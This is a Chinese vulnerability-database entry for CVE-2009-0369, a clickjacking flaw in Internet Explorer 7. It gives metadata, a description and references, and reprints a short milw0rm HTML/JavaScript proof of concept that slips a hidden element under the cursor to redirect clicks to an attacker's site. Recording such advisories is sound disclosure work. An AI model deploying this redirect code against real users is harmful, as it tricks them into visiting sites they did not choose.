Microsoft Internet Explorer 用户欺骗漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117316 漏洞类型 其他
发布时间 2009-01-29 更新时间 2009-01-30
CVE编号 CVE-2009-0369 CNNVD-ID CNNVD-200901-462
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7912
https://www.securityfocus.com/bid/79617
https://cxsecurity.com/issue/WLB-2009020076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-462
|漏洞详情
MicrosoftInternetExplorer7版本允许远程攻击者借助一个onclick事件,欺骗用户访问任意的URI。该onclick事件会将一个特制的元素转移到当前鼠标所在的位置。它与"click劫持"漏洞有关。
|漏洞EXP
#############################################################
# Application Name       : Ä°nternet Explorer 7
# Vulnerable Type        : Clickjacking
# Author                     : UzmiX
#############################################################
< ------------------- header data end of ------------------- >
<html>
<body>
<div id="open"
onmouseover="document.location='http://www.uzmix.net';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>

# milw0rm.com [2009-01-29]
|受影响的产品
Microsoft Internet Explorer 7 6.0.2900 2180 Microsoft Internet Explorer 7 0 Microsoft Internet Explorer 7.0.5730 .11 Microsoft Internet Explorer 7.0 beta3 Microsoft Internet Explorer 7.0 b
|参考资料

来源:XF
名称:ie-onclickaction-click-hijacking(48542)
链接:http://xforce.iss.net/xforce/xfdb/48542
来源:MILW0RM
名称:7912
链接:http://www.milw0rm.com/exploits/7912